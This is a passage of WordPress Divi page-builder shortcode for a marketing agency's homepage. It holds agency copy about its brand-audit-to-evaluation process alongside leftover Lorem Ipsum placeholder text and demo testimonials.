_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" 